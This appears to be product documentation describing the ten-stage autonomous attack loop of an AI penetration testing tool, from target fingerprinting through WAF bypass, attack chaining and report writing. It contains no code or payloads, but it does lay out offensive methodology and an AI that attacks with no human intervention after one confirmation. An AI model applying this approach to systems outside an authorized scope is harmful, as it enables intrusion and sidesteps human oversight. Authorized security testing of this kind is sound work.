10-Stage Adaptive Engine

A complete walkthrough of each stage in PhantomYerra's Adaptive Attack Loop — what happens, what the AI decides, and how each stage feeds the next.

1

Target Analysis

Fingerprint before you fire

Before any attack payload is sent, the engine thoroughly fingerprints the target. This stage identifies the technology stack, server software, frameworks, WAF/CDN presence, TLS configuration, and application behavior patterns. Every subsequent stage uses this profile to make informed decisions.

Target Received | v HTTP Header Analysis ---> Server/Framework ID | v TLS Certificate Inspection ---> Cipher + Cert Chain | v Technology Stack Detection ---> Language, CMS, DB hints | v WAF/CDN Detection ---> Defensive posture mapped | v DNS Enumeration ---> Infrastructure topology | v Target Profile Complete ---> Pass to Stage 2

Inputs

  • Target URL / IP / hostname
  • Scope definition
  • Engagement type

Outputs

  • Technology fingerprint
  • WAF/CDN identification
  • TLS configuration
  • Infrastructure map

Real-World Example

The engine detects the target is running a PHP application on Apache with MySQL behind a Cloudflare WAF. This intelligence means every SQL injection payload will use MySQL syntax, every bypass technique will target Cloudflare-specific weaknesses, and PHP-specific vulnerability classes (deserialization, type juggling) are added to the attack plan.

2

Surface Mapping

Find every door before picking locks

The engine enumerates every attackable surface: endpoints, parameters, input vectors, authentication boundaries, and API contracts. Surfaces are prioritized by exploitability and business impact so the most critical paths are tested first.

Target Profile | v Crawl Endpoints ---> Full URL inventory | v Extract Parameters ---> Forms, JS, API responses | v Hidden Path Discovery ---> Debug, admin, backup paths | v Auth Boundary Mapping ---> Public vs. protected zones | v API Schema Reconstruction ---> REST, GraphQL, WebSocket | v Surface Map Complete ---> Prioritized by risk

Inputs

  • Target profile from Stage 1

Outputs

  • Complete endpoint inventory
  • Parameter map
  • Auth boundary map
  • API schema

Real-World Example

Crawling reveals 342 endpoints. Parameter extraction identifies 89 unique input parameters across forms and API calls. Hidden path discovery finds /api/v1/debug/config returning a 200 with no authentication. This debug endpoint is immediately escalated to highest priority in the attack plan.

3

Attack Planning

Strategy before force

The AI creates a prioritized attack plan, selecting vulnerability classes that match the detected technology stack and ranking tests by severity and exploitability. The plan is not static — it is continuously revised as new intelligence arrives from later stages.

Surface Map + Profile | v Select Vulnerability Classes ---> Matched to tech stack | v Map Payloads to Parameters ---> Right payload, right target | v Rank by Severity x Impact ---> Critical first | v Apply Scope Constraints ---> Boundaries enforced | v Attack Plan Ready ---> User confirms once, AI runs

Inputs

  • Target profile
  • Surface map
  • Engagement constraints

Outputs

  • Ranked attack queue
  • Per-parameter payload selections
  • Estimated timeline

Real-World Example

For a PHP/MySQL target, the AI prioritizes: (1) SQL injection on all database-backed parameters, (2) authentication bypass on login endpoints, (3) file inclusion on path parameters, (4) deserialization on serialized input fields. Generic checks like XML injection are deprioritized because no XML parsing was detected.

4

Execution

Controlled, captured, complete

The engine executes the attack plan autonomously, sending context-aware payloads at a rate-controlled pace. Every request-response pair is captured with full headers, body, and timing data. Session state and authentication tokens are maintained across tests.

Inputs

  • Attack plan
  • Target profile
  • Payload library

Outputs

  • Raw request/response pairs
  • Timing data
  • Error signatures
  • Partial hit signals
5

Result Analysis

Every response tells a story

Every response is analyzed for four possible outcomes: confirmed vulnerable (evidence captured), filter detected (WAF/input validation identified), partial signal (response differs from baseline in meaningful ways), or no signal (parameter tested, no indication of vulnerability). Partial signals are treated as leads and fed back into the loop.

Response Data | v Status Code Analysis ---> 200/403/500/302 patterns | v Error Message Parsing ---> Technology and filter clues | v Content Diff ---> Baseline vs. test response | v Timing Analysis ---> Blind/time-based detection | +--- Confirmed --------> Capture Evidence (Stage 9) | +--- Filter Detected ---> Identify + Escalate (Stage 7) | +--- Partial Signal ----> Refine + Retry (Stage 6) | +--- No Signal ---------> Mark Tested, Continue
6

AI Pivot Decision

The strategic brain

This is the core of the "Never Give Up" engine. The AI evaluates every new finding and decides the optimal next action: deep-dive on the same surface, lateral pivot to similar surfaces, chain pivot to combine findings, escalation pivot to test for higher impact, or technology pivot when new tech is discovered. No human intervention required.

See full AI Pivot Logic documentation →

7

Payload Adaptation

Craft, don't copy

When a filter or WAF blocks a payload, the engine does not give up. It identifies the filter type, selects the appropriate bypass level, generates an adapted payload, applies encoding layers, and retries. Eight escalation levels ensure every known bypass technique is attempted before marking a parameter as exhausted.

See full Payload Adaptation documentation →

8

Chain Building

Impact through combination

Individual findings are correlated and linked into multi-step attack chains. An SSRF finding combined with internal service discovery becomes a potential RCE path. An information disclosure combined with an authentication bypass becomes full account takeover. The AI validates each chain step to ensure the full path is executable.

See full Attack Graph documentation →

9

Evidence Collection

Forensic-grade proof

Every confirmed finding receives a complete evidence package: raw HTTP request, raw HTTP response, extracted data, timing information, SHA-256 hash, RFC 3161 timestamp, and a copy-paste reproducible PoC script. Evidence integrity is maintained through cryptographic hashing at capture time.

See full Evidence Chain documentation →

10

Report Generation

Professional prose, not data dumps

The AI writes professional penetration test reports: executive summaries for business audiences, technical findings with CVSS scores and evidence, attack chain narratives showing step-by-step exploitation, specific remediation guidance, compliance mapping, and a full evidence appendix. Reports are generated in PDF and HTML formats.

Report Sections

  • Executive Summary
  • Technical Findings
  • Attack Chain Narratives
  • Remediation Plan
  • Compliance Mapping
  • Evidence Appendix

Output Formats

  • PDF (professional layout)
  • HTML (interactive)
  • JSON (machine-readable)
  • CSV (finding export)

The Loop: Why Stages 5–7 Are Continuous

Stages 5 (Result Analysis), 6 (AI Pivot Decision), and 7 (Payload Adaptation) form a continuous inner loop. For every parameter on every endpoint, this cycle repeats until the parameter reaches one of two terminal states:

Terminal StateMeaningReport Treatment
CONFIRMED Vulnerability confirmed with evidence Full finding write-up with PoC, evidence, CVSS, remediation
EXHAUSTED Every known technique attempted, none confirmed Documented as "tested thoroughly" with full attempt history
Critical distinction: EXHAUSTED is NOT "not vulnerable." It means "we tried every known approach and could not confirm." The full attempt history is included in the report, showing the client exactly how thoroughly each parameter was tested.